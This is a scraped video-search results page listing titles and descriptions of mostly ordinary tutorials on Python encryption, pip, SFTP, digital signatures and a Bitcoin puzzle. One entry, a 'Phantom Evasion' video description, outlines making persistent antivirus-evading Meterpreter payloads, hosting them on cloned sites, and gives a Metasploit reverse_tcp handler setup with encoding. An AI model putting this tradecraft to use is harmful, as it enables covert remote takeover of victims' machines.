Home
Search results “Pycrypto documentation pdf converter”
How to Encrypt Strings and Files in Python
 
05:31
In this video I show you how to encrypt and decrypt strings and files using Python. I show you how to create a key, store the key and then how to use the key to encrypt and decrypt strings and files. This video demonstrates the use of the cryptography module. 🌎 Post with code and a written tutorial: https://nitratine.net/blog/post/encryption-and-decryption-in-python/ 📺 Auto Py to Exe: https://youtu.be/OZSZHmWSOeM 📺 Python GUI Using Chrome: https://youtu.be/2kbeBzEQfXE 📺 How to Send Emails in Python: https://youtu.be/YPiHBtddefI The cryptography is supported by Python 2.7 and Python 3.4 and above. (Also PyPy 5.3+) 🌎 cryptography docs: https://cryptography.io/en/latest/ 🐍 In this video I use Python 3.6. 👍🏼 Feel free to comment with any issues.
Views: 19741 PyTutorials
How to download and install Python Packages and Modules with Pip
 
08:32
This tutorial covers how to download and install packages using pip. Pip comes with newer versions of Python, and makes installing packages a breeze. ImportError: DLL load failed: The specified module could not be found : http://stackoverflow.com/questions/20201868/importerror-dll-load-failed-the-specified-module-could-not-be-found
Views: 821419 sentdex
Python Script to make PDF file Password Protected
 
01:06
You cannot compromise with the Document Security. So we have a solution for you. Script written by me in Python can convert any PDF file to a password protected file
Views: 45 nukul gupta
FTP SFTP with Python Tutorial - p2. Putting files to server
 
11:41
Welcome to my tutorial concerning how to use Python for SFTP / FTP in order to get and put files from and to webservers via Secure File Transfer Protocol. This video teaches you specifically how to put files from your local machine to a remote server using SFTP (secure file transfer protocol). Make sure you install in the following order: PyCrypto, Paramiko, PySFTP. 32-bit: https://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.6.1.tar.gz https://pypi.python.org/packages/source/p/paramiko/paramiko-1.12.0.tar.gz 64-bit: PyCrypto: http://www.voidspace.org.uk/downloads/pycrypto26/pycrypto-2.6.win-amd64-py2.7.exe Paramiko: http://dragffy.com/blog/wp-content/uploads/2011/11/paramiko-1.7.7.1.win-amd64_Jaraco_patch.exe Then: https://code.google.com/p/pysftp/downloads/detail?name=pysftp-0.2.2.tar.gz Sentdex.com Facebook.com/sentdex Twitter.com/sentdex
Views: 25538 sentdex
How to Add Digital Signature in PDF File | Karn Consultant
 
03:54
How to Add Digital Signature in PDF File Digital Signature Certificate Add in PDF File #DigitalSignPDF #Howtodigitalsignpdf
Views: 417 Karn Consultant
How To Send an Email in Python With Attachments Easy for Beginners
 
20:01
How To Send an Email in Python With Attachments Easy for Beginners Code (Github): https://github.com/samlopezf/Python-Email Signup to my Python Developers Guide to Learning Python: http://eepurl.com/c06OgL Subscribe: https//bit.ly/SubFreeNow Hi Everyone, In this video, I explain in depth how to send an email in Python via SMTP protocol. I show a nice example using a Gmail's SMTP server. CC contribution Link: http://www.youtube.com/timedtext_video?ref=share&v=bXRYJEKjqIM
Views: 47663 HowToFAQ
Readin Arabic in Python Converting from Unicode to characters and symbols in Python p.1
 
09:12
Part 2: http://youtu.be/nQkaBiOwsIo As requested, this is a tutorial showing users how to handle unicode on websites like Twitter. This can be used to convert things like special language symbols, things like smileys/emoticons, and really any of the symbols that you will come across as unicode as you parse or stream. Since the main request was for Arabic, that is the example used here, though it works across the board. Sentdex.com Facebook.com/sentdex Twitter.com/sentdex
Views: 12102 sentdex
How to generate the MD5 checksum of a file using python
 
03:59
The video shows how to write a simple code to generate the md5 checksum of a file using python. Follow PyBear on FACEBOOK, https://www.facebook.com/pybear881/
Views: 2751 PyBear
Angular Signature Pad
 
31:39
Signature pad using angular
Views: 1148 Lokesh G
Digital Signing and Verification using CSharp
 
08:31
This tutorial demonstrates digital signing and verification using the Bouncy Castle APIs in C#.
Views: 21218 PKIIndia
XML Signature
 
09:40
XML Signature defines an XML syntax for digital signatures and is defined in the W3C recommendation XML Signature Syntax and Processing. Functionally, it has much in common with PKCS#7 but is more extensible and geared towards signing XML documents. It is used by various Web technologies such as SOAP, SAML, and others. XML signatures can be used to sign data–a resource–of any type, typically XML documents, but anything that is accessible via a URL can be signed. An XML signature used to sign a resource outside its containing XML document is called a detached signature; if it is used to sign some part of its containing document, it is called an enveloped signature; if it contains the signed data within itself it is called an enveloping signature. This video is targeted to blind users. Attribution: Article text available under CC-BY-SA Creative Commons image source in video
Views: 3760 Audiopedia
Python Scripts to Executables with Py2exe tutorial
 
07:59
This tutorial teaches you how to turn your typical python scripts into .exe files that you can share without users needing to have python or any modules installed in order to run them. Definitely a must-have for any application developer who uses python. I will eventually expand on some py2exe examples, especially with matplotlib and other harder-to-convert modules. Stay tuned! Sentdex.com Facebook.com/sentdex Twitter.com/sentdex
Views: 69101 sentdex
PDF Password Recovery with AccentPPR. How-to Guide
 
01:44
Accent PDF Password Recovery recovers and removes: - Document open password (User password) - Permissions password (Master password) Accent PDF Password Recovery supports: - Acrobat 2-4 (RC4 40-bit) - Acrobat 5-8 (RC4 128-bit, AES-128) - Acrobat 9-XI (AES-256) For more information, visit: http://passwordrecoverytools.com/pdf-password.asp
Python Tutorial: Make Your Own Text Editor
 
12:32
Hi guys, this is how to make your very own text editor using Python and its built-in modules Tkinter and tkFileDialog. This is just a basic GUI application with New, Open, Save, and Save As capabilities. Enjoy the video! Also, complete source code as well as many other tutorials/downloads are available on my website at http://www.thepyportal.com please Follow me on Facebook and be sure to subscribe for new videos released at least every week! Thanks for watching!
Views: 51374 Zach King
How to hide messages behind pictures (Steganography)
 
04:49
Steganography Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. OR Steganography is data hidden within data. Steganography is an encryption technique that can be used along with cryptography as an extra-secure method in which to protect data. Steganography techniques can be applied to images, a video file or an audio file. Step 1: Get a picture Step 2: Generate the text message you want to conceal Step 3: Open MS Publisher 2010 Step 4: Type the text you want to conceal into MS Publisher text box Step 5: Copy and paste the picture on the text you want to conceal Step 6: Convert the MS Publisher file into PDF Step 7: Open the newly convered PDF file to verify the text has been concealed Step 8: Use a PDF to MS Word converter to convert the PDF to .doc file format Step 9: Open the newly converted .doc file in MS Word Step 10: Delete the picture in MS Word to reveal the concealed text To do it my way, here is what I used Picture, Text, MS Publisher 2010, MS Word 2010, PDF Reader(Foxit), PDF2Wordv2.0 Record PC Screen - Filmora Music - Simple Deciduous
Views: 264 AvGeeek
👻Phantom Evasion Persistant Windows Python Payload💣"Byassing🔃🛡 AV Methods "Less Detectable"
 
13:01
**Disclaimer all videos are made with permission on my own test network hacking into device without consent is a crime we are not responsible for the misuse of this information** Hide payloads behind working exes make them more believable and less detectable using the trojanizer. https://youtu.be/xFAfRt87jjY In this video we use phantom evasion to create a python payload script made to be executable on windows that make a persistent payload that uses the python metepreter shell we demo this on a Windows 10 computer the payload we use is a python script complied into a exe but you can use the .py file on any device that runs python like linux for example to gain a shell because the python meterpreter works on mulitple operations systems you can use the .py file on multi operation systems the exe file is for windows if you want to run a python file om say linux type " python filename.py " to run it I demoed this payload because it seems to have a very low rate of detection use the https payload and a encoded stagers when making the payload and setting up the multi handler for maximum undetectabilty again there is no magic payload that will bypass all antivirus but phantom evasion is by far one of the best tools out there to help you so it some of the payloads may now not worl as well but they still have low detection rates and using options like custom shell code and scripts and running them through phantom evasion will help make your payloads wither fud or almost fud check out my bypass av playlist for more bypass av methods remember these payloads made by phantom evasion normally run loops so they will keep trying to connect back to the host meaning you will have at least that persistence measure in place from the start so if you lose your shell just open another multi handler a.k.a listener and you should get your shell back when the script loops back around to call out for a shell connection. Find us on Facebook at Stealth Data Zero Instagram @pwned_and_exploited Twitter @Stealth_data_0 *related videos* How to hit clone and install and use oahntim evasion and its Persistant FUD payloads. https://youtu.be/cIVB_WblvvU Using phantom evasion to hack Windows 10 and its camrea and bypass Malwarebytes scan and all and windows defender with a Persistant payload. https://youtu.be/2gqB3wwC9Mc Use phantom evasion to make Persistant harder to detect payloads apk payloads for android. https://youtu.be/cSbmAb6h-vw Av bypassing methods and techniques on multiple devices, operating systems, etc. Bypassing Antivirus & Windows Defender FUD Payloads & Techniques: https://www.youtube.com/playlist?list=PLIHNLucfRK5ML9lb_DsMqB34CJCii7Vps Take any file / payload and encrypt it then host from a automatically downloading file sharing website making it easy to get a payload on a device. https://youtu.be/yredLSh25Iw Clone any website and then host a payload from it making ypur chances of successful clinet side attack much much higher binded payloads hosted from cloned websites you can do this with fud payloads and using the trojanizer or like the demo use a msfvenom payload binded to a working exe file. https://youtu.be/wQrh8FNVAM8 "NOTE" To set up a multi handler with encoding and a encoded stager for extra protection use the example below it's the same options we set before but we add a few settings to set the encoding up on the multi handler and the stager used to open the shell we also set the exit on session to false to help not get dead session errors use a https or rc4 payload fir max results. Use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT "port you picked" set LHOST "your ip" set Encoder x86/shikata_ga_nai set Iterations 10 Set EnableStagedEncoding true Set ExitOnSession false exploit #hacking #pentesting #kalilinux
Views: 350 Data Zero
C Program to Encrypt and Decrypt A File
 
11:40
Video tutorial that explains the C programs to encrypt and decrypt a file. You will learn to convert a text file into a coded form. After encrypting of a file, you will be explained how to decrypt it back to the original file. In this C programming video tutorial, you will learn how to encrypt a file, source code for encryption and decryption in c, and encryption using c. Step by step the entire program is explained with, data encryption, c program caesar cipher and c language caesar code along with data encryption & decryption program. From this video you will learn about, c program for encryption and decryption using caesar cipher, c program for encryption and decryption of string and source code for data encryption & decryption. By the end of this video tutorial you will have a clear understanding of, encryption decryption, caesar cipher program encryption decryption and caesar cipher program along with caesar cipher in c language. If you are looking for, caesar cipher in c code, encryption program in c and caesar cipher in c along with c programming cipher, then this video is for you. This video tutorial is made for beginners to understand caesar cipher c code, c programming caesar, c caesar cipher, ceasar cipher program in c and data encryption standard and cryptographic along with aes encryption, advanced encryption standard and c programming cezar and convert case too. For code of encrypting a file, use the following link: http://bmharwani.com/encryptfile.c For code of decrypting a file, use the following link: http://bmharwani.com/decryptfile.c For more videos on C Programming, visit: https://www.youtube.com/watch?v=zkrCGJIdcGk&t=2s&list=PLuDr_vb2LpAz7rD1blSh6b91-nQ4j9B3V&index=5 For notification of new videos, you can subscribe my channel: https://www.youtube.com/c/bintuharwani. To know more about me, visit, http://bmharwani.com
Views: 4525 Bintu Harwani
Introducing the 310 BTC Bitcoin Challenge
 
03:33
In this video I will talk about the Introducing the 310 BTC Bitcoin Challenge which is all the craze right now. There is an Anonymous person going by the name of "Pip" that claims is giving away 310 Bitcoin to the person that can extract the private keys from the image. You heard it right, 2 million in BTC. There are many groups trying to solve this problem including Bitcoin talk, Reddit, and Discord. According to the website, there are 4 Wallets up for grabs incluidng .1 BTC, .2 BTC,.31 BTC and 310 BTC . There is supposed rumors that the wallets source traces back to Mt Gox. Good luck and be sure to post updates and clues as we follow this. Could you be the lucky one to find 2 Million in BTC? Thanks for watching. Subscribe and Hit that Bell Notification for all the Latest SubScribe : https://www.youtube.com/HOWHEDOIT?sub_confirmation=1 CHALLENGE LINKS --------------------------------------------------------------------------- Discord Clue Tracking - Get you up to speed https://docs.google.com/document/d/1nUAhlC_n21ZLZcRAHpLw9G--gpk4NUVIJqVp9F68qp4/preview Challenge Main Website https://bitcoinchallenge.codes/ Challenge Image https://bitcoinchallenge.codes/images/challenge.png Reddit Main Thread https://www.reddit.com/r/Bitcoin/comments/9kq7it/introducing_the_310_btc_bitcoin_challenge/ Bitcoin Talk Thread https://bitcointalk.org/index.php?topic=5042285.0 Discord Channel (Group Think) https://discordapp.com/channels/403741830812008449/487515469771964416 FUNDS VERIFY ---------------------------------------------- 310 BTC https://www.blockchain.com/btc/address/39uAUwEFDi5bBbdBm5ViD8sxDBBrz7SUP4 .31 BTC https://www.blockchain.com/btc/address/3NPZiNWiD7cCfXZa1D8tnEZBPgQ884cVw7 .2 BTC https://www.blockchain.com/btc/address/1G7qsUy5x9bUd1pRfhVZ7cuB5cMUP4hsfR .1 BTC https://www.blockchain.com/btc/address/1446C8HqMtvWtEgu1JnjwLcPESSruhzkmV Tools for the Challenge ----------------------------------------- Binary Converter https://www.convertbinary.com/alphabet/ Morse Code Translator https://morsecode.scphillips.com/translator.html Python command to convert binary strings into morse code https://pypi.org/project/morse/ SHA hash generator https://www.mytecbits.com/tools/cryptography/sha2generator Cornell Article on Voronoi Diagrams http://www.cs.cornell.edu/courses/cs100r/2007fa/lectures/100R-lec21.pdf Other article on Voronoi http://msn.iecs.fcu.edu.tw/~ccc/profile/publish/ij_paper2/IJ-664.pdf Binary Code Image Converter https://www.dcode.fr/binary-image ASCII Converter https://www.branah.com/ascii-converter Thanks for watching. Subscribe and Hit that Bell Notification for all the Latest 👍👍👍 Support The Channel 👍👍👍 Patreon: https://www.patreon.com/CryptoSlo - Support Video Creation!! SubScribe Now : https://www.youtube.com/HOWHEDOIT?sub_confirmation=1 Buy Crypto @ CoinBase: https://www.coinbase.com/join/59f9eceabdc92c00d4d9a1df Track Your Taxes: https://cointracking.info?ref=M758326 Free BitCoin: https://freebitco.in/?r=13981142 (Dice Faucet) 😎😎😎 Join the Community 😎😎😎 Discord With Me: https://discord.gg/8RdCcd6 Tweet With Me: https://twitter.com/BitcoinSLO Trade With Me: https://www.binance.com/?ref=16159030 ★★★ My Favorite CryptoSites ★★★ BitScreener: https://bitscreener.com/ TradingView Charts: https://www.tradingview.com/markets/cryptocurrencies/ CoinDesk News: https://www.coindesk.com/ Password Generator: (Creates Strong passes): https://passwordsgenerator.net/ 💰💰💰 Tips 💰💰💰 Donate RavenCoin [RVN]: RGQvqTGxkJMqF6opKptwuJKvWUNZohZBcu Donate DogeCoin [DOGE]: DKgESL2CPHh9BqRPa9NaSy6CczqEFgJCJQ Donate Verge [XVG]: DJgDAFd7uhdiRtGASZoNmnG6UjDJ1ifAZX ❗️❗️❗️ DISCLAIMER ❗️❗️❗️ The content in this video references an opinion and is for information and entertainment purposes only. It is not intended to be investment advice. Seek a duly licensed professional for investment advice. Edited With : Camtasia
Views: 4581 HowHeDoIt
How to install Visual Studio Code on Windows
 
05:39
In this post we will see How to install Visual Studio Code on Windows. VS Code runs on Mac, Linux, and Windows. See Requirements for the supported versions. VS Code is a free, open source editor. -------------------Online Courses to learn---------------------------- Blockchain Course - http://bit.ly/2Mmzcv0 Big Data Hadoop Course - http://bit.ly/2MV97PL Java - https://bit.ly/2H6wqXk C++ - https://bit.ly/2q8VWl1 AngularJS - https://bit.ly/2qebsLu Python - https://bit.ly/2Eq0VSt C- https://bit.ly/2HfZ6L8 Android - https://bit.ly/2qaRSAS Linux - https://bit.ly/2IwOuqz AWS Certified Solutions Architect - https://bit.ly/2JrGoAF Modern React with Redux - https://bit.ly/2H6wDtA MySQL - https://bit.ly/2qcF63Z ----------------------Follow--------------------------------------------- My Website - http://www.codebind.com My Blog - https://goo.gl/Nd2pFn My Facebook Page - https://goo.gl/eLp2cQ Google+ - https://goo.gl/lvC5FX Twitter - https://twitter.com/ProgrammingKnow Pinterest - https://goo.gl/kCInUp Text Case Converter - https://goo.gl/pVpcwL -------------------------Stuff I use to make videos ------------------- Stuff I use to make videos Windows notebook – http://amzn.to/2zcXPyF Apple MacBook Pro – http://amzn.to/2BTJBZ7 Ubuntu notebook - https://amzn.to/2GE4giY Desktop - http://amzn.to/2zct252 Microphone – http://amzn.to/2zcYbW1 notebook mouse – http://amzn.to/2BVs4Q3 ------------------Facebook Links ---------------------------------------- http://fb.me/ProgrammingKnowledgeLearning/ http://fb.me/AndroidTutorialsForBeginners http://fb.me/Programmingknowledge http://fb.me/CppProgrammingLanguage http://fb.me/JavaTutorialsAndCode http://fb.me/SQLiteTutorial http://fb.me/UbuntuLinuxTutorials http://fb.me/EasyOnlineConverter
Views: 71431 ProgrammingKnowledge
XML Signature App Demo for BOI
 
03:19
Short demonstration of signing XML file on the desktop with CoSign appliance
Views: 1652 Sharon Ben-Avraham
TUTORIAL: DEPLOYING COURSE BUILDER FROM ANY OS (MARCH 2017)
 
04:34
PLEASE SEE THE FULL GUIDE: https://groups.google.com/d/msg/course-builder-forum/kj0yHlw693c/N_XkvVqMAAAJ If you get errors, you may want to start over making use of both the full text guide and the video. --------------------------------------------------------------------------------------------- COMMANDS TO BE RUN: The commands to be pasted in do not show up here properly - you may copy them from the full guide ( https://groups.google.com/d/msg/course-builder-forum/kj0yHlw693c/N_XkvVqMAAAJ ). If you are already connected via SSH to the virtual machine, you can begin from the step that reads: "Install prerequisites by copying and pasting and running ..." Basically, you just need to copy and paste in 6 commands into the virtual machine (but read the directions and make sure to change the last command and also use your browser to give Google permissions when asked). --------------------------------------------------------------------------------------------- If you experience latency issues: After downloading and unzipping CourseBuilder (with the unzip command), you can edit the app.yaml file (it is at coursebuilder/app.yaml - you can use the command "nano coursebuilder/app.yaml") and then modify the contents, for example, to increase the instance class from F1 to F2: instance_class: F1 - to - instance_class: F2 You can quit nano by pressing Ctrl+X, then press Y and Enter to save. For more information on increasing efficiency by modifying app.yaml, visit: https://cloud.google.com/appengine/docs/standard/python/config/appref You will find here other customizations you can do to automatic_scaling to make your app work faster, for example, by specifying a higher number for "min_idle_instances". Note that this will also impact your costs. You may sign up for a free trial of Google Cloud which will give you $300 for free to start with: https://cloud.google.com/free/
Views: 4930 Augustine C
simple xml signin
 
34:30
Here is a very simple registration and sign in page for a windows forms desktop application. This is by no means a secure solution for user sign in. instead it can be used to keep track of a users game info locally using an xml file
Views: 894 Gary Hengeveld
Devoxx US 2017: Create high performance runtimes with Eclipse OMR
 
06:49
For links to the resources mentions, go to https://developer.ibm.com/tv/devoxx-us-2017-eclipse-omr-runtimes/ At Devoxx US 2017, Dan Heidinga, JVM Team Lead at IBM Runtime Technologies, and Charlie Gracie, Software Developer on the OpenJ9 virtual machine project and a lead on the OMR project, discuss the Eclipse OMR project, an integrated set of open source C and C++ components that can be used to build language runtimes that run on different platforms. The OpenJ9 virtual machine is the largest consumer of the OMR components. What the language-agnostic project does is take tooling for a single language and uses it across all runtimes, creating a reusable runtime foundation for cloud platforms. The Eclipse OMR components include a platform porting library, a thread library, diagnostic services, monitoring services, a just-in-time compiler, and a garbage collector. The OpenJ9 virtual machine is a high performance, modern Java VM based on the high performance runtime infrastructure in the Eclipse OMR project, including garbage collection and JIT compiler. The VM uses the OpenJDK class libraries, but still allows you to experiment at the virtual machine level. More information - Explore the Eclipse OMR project - Explore the OpenJ9 VM - Take an overview tour of Eclipse OMR - developerWorks Open has a great Tech Talk on Eclipse OMR, as well as a project page on the technology - Learn more about the project code at GitHub
Views: 161 IBM Developer
List of free and open-source software packages | Wikipedia audio article
 
46:29
This is an audio version of the Wikipedia Article: https://en.wikipedia.org/wiki/List_of_free_and_open-source_software_packages 00:00:53 1 Applied fields 00:01:03 1.1 Artificial intelligence 00:02:09 1.2 CAD 00:02:31 1.2.1 Electronic design automation (EDA) 00:02:41 1.3 Computer simulation 00:03:11 1.4 Desktop publishing 00:03:35 1.5 Finance 00:06:00 1.6 Integrated Library Management Software 00:06:33 1.7 Image editor 00:07:17 1.8 Mathematics 00:07:26 1.9 Reference management software 00:07:35 1.10 Science 00:07:44 1.10.1 Bioinformatics 00:07:52 1.10.2 Cheminformatics 00:08:06 1.10.3 Geographic Information Systems 00:08:16 1.10.4 Grid computing 00:08:33 1.10.5 Microscope image processing 00:09:41 1.10.6 Molecular dynamics 00:10:17 1.10.7 Molecule viewer 00:11:08 1.10.8 Nanotechnology 00:11:24 1.10.9 Plotting 00:11:31 1.11 Quantum chemistry 00:11:49 1.12 Risk Management 00:12:04 1.13 Statistics 00:12:12 1.14 Surveys 00:12:24 2 Assistive technology 00:12:34 2.1 Speech (synthesis and recognition) 00:13:21 2.2 Other assistive technology 00:13:43 3 Data storage and management 00:13:52 3.1 Backup software 00:14:01 3.2 Database management systems (including administration) 00:14:13 3.3 Data mining 00:15:43 3.4 Data Visualization Components 00:16:12 3.5 Digital Asset Management software system 00:16:28 3.6 Disk partitioning software 00:16:37 3.7 Enterprise search engines 00:16:58 3.8 ETLs (Extract Transform Load) 00:17:14 3.9 File archivers 00:17:23 3.10 File Systems 00:17:54 4 Networking and Internet 00:18:04 4.1 Advertising 00:18:14 4.2 Communication-related 00:19:15 4.3 E-mail 00:19:33 4.4 File transfer 00:19:42 4.5 Grid and distributed processing 00:19:59 4.6 Instant messaging 00:20:07 4.7 IRC Clients 00:20:16 4.8 Middleware 00:21:00 4.9 RSS/Atom readers/aggregators 00:21:32 4.10 Peer-to-peer file sharing 00:21:52 4.11 Portal Server 00:22:11 4.12 Remote access and management 00:22:34 4.13 Routing software 00:22:42 4.14 Web browsers 00:23:25 4.15 Webcam 00:23:39 4.16 Webgrabber 00:23:53 4.17 Web-related 00:25:33 4.18 Other networking programs 00:25:59 5 Educational 00:26:08 5.1 Educational suites 00:27:45 5.2 Geography 00:27:58 5.3 Learning support 00:28:07 5.4 Language 00:28:18 5.5 Typing 00:28:38 5.6 Other educational programs 00:28:51 6 File managers 00:29:01 7 Games 00:29:09 7.1 Application layer 00:29:24 8 Genealogy 00:29:33 9 Graphical user interface 00:29:43 9.1 Desktop environments 00:29:52 9.2 Window managers 00:30:01 9.3 Windowing system 00:30:10 10 Groupware 00:30:18 10.1 Content management systems 00:30:28 10.2 Wiki software 00:30:37 11 Healthcare software 00:30:46 12 Hobby software 00:30:55 12.1 Homebrewing 00:31:05 13 Media 00:31:14 13.1 2D animation 00:31:48 13.2 3D animation 00:32:20 13.3 Audio editors, audio management 00:32:30 13.4 CD/USB-writing software 00:32:41 13.5 Flash animation 00:32:56 13.6 Graphics 00:33:04 13.7 Image galleries 00:33:13 13.8 Image viewers 00:33:33 13.9 Multimedia codecs, containers, splitters 00:33:44 13.10 Television 00:33:53 13.11 Video converters 00:34:09 13.12 Video editing 00:34:49 13.13 Video encoders 00:35:03 13.14 Video players 00:35:17 13.15 Other media packages 00:35:30 14 Office suites 00:36:01 15 Operating systems 00:36:22 15.1 Emulation and Virtualisation 00:36:34 16 Personal information managers 00:37:11 17 Programming language support 00:37:21 17.1 Bug trackers 00:37:38 17.2 Code generators 00:38:49 17.3 Documentation generators 00:39:21 17.4 Configuration software 00:39:37 17.5 Debuggers (for testing and trouble-shooting) 00:40:01 17.6 Integrated development environments 00:40:11 17.7 Version control systems 00:40:21 18 Screensavers 00:40:35 19 Security 00:40:44 19.1 Antivirus 00:41:00 19.2 Data loss prevention 00:41:11 19.3 Data recovery 00:41:27 19.3.1 Forensics 00:41:39 19.3.1.1 Anti-forensics 00:41:49 19.4 Disk erasing 00:42:01 19.5 Encryption 00:42:27 19.5.1 Disk encryption 00:42:42 19.5.2 Database encryption 00:42:52 19.6 Firewall 00:43:25 19.7 Network and security monitoring 00:43:35 19.8 Secure Shell (SSH) 00:44:02 19.9 Password management 00:44:16 19.10 Other security programs 00:44:26 20 Theology 00:44:34 20.1 Bible study tools 00:45:04 21 Typesetting 00:45:13 22 See also 00:46:06 22.1 General directories Listening is a more natural way of learning, when compared to reading. Written language only began at around 3200 BC, but spoken language has existed long ago. Learning by listening is a great way to: - increases imagination and understanding - improves your listening skills - improves your own spoken accent - learn while on the move - reduce eye strain Now learn the vast amount of general knowledge available on Wikipedia through audio (audio article). You could even learn subconsciously by playing the audio while you are sleeping! If you are planning to listen a lot, you could try using a bone conduction headphone, or a standard speaker instead of an earphone. Listen on Google Assistant through Extra Audio: htt ...
Views: 25 wikipedia tts